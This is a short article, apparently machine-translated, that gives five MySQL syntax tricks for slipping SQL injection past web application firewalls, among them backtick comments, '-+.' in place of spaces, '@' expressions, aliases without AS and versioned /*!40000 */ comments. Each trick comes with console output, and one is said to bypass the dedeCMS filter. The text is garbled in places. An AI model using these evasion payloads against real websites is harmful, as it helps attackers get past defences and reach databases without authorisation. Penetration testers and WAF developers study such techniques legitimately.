In this article, I will share with you several WAF bypass skills. For some tips that everyone knows, such :/*! */, SELECT [0x09, 0x0A-0x0D, 0x20, 0xA0] xx FROM does not recreate the wheel.
Mysql:
Tips1: Magic '(the controller of the output table in the format)
Space and some regular expressions.
- mysql> select`version`()
- -> ;
- +----------------------+
- | `version`() |
- +----------------------+
- | 5.1.50-community-log |
- +----------------------+
- 1 row in set (0.00 sec)
A more interesting technique, this 'control' can be used as a annotator to limit conditions ).
- mysql> select id from qs_admins where id=1;`dfff and comment it;
- +----+
- | id |
- +----+
- | 1 |
- +----+
- 1 row in set (0.00 sec)
- `>usage : where id =’0′`’xxxxcomment on.
Tips2: the magic "-+ .":
- mysql> select id from qs_admins;
- +----+
- | id |
- +----+
- | 1 |
- +----+
- 1 row in set (0.00 sec)
-
- mysql> select+id-1+1.from qs_admins;
- +----------+
- | +id-1+1. |
- +----------+
- | 1 |
- +----------+
- 1 row in set (0.00 sec)
-
- mysql> select-id-1+3.from qs_admins;
- +----------+
- | -id-1+3. |
- +----------+
- | 1 |
- +----------+
- 1 row in set (0.00 sec)
Some people are not always talking about keywords. Why? Filter A from... That's how it starts)
Tips3 :@
- mysql> select@^1.from qs_admins;
- +------+
- | @^1. |
- +------+
- | NULL |
- +------+
This is the bypass dedeCMS filter.
Or the following is also possible:
Tips4: mysql function () as xxx does not need as or space
- mysql> select-count(id)test from qs_admins;
- +------+
- | test |
- +------+
- | -1 |
- +------+
- 1 row in set (0.00 sec)
Tips5 :/*! [> 5000] */The new build number may be outdated .)
- mysql> /*!40000select*/ id from qs_admins;
- +----+
- | id |
- +----+
- | 1 |
- +----+
- 1 row in set (0.00 sec)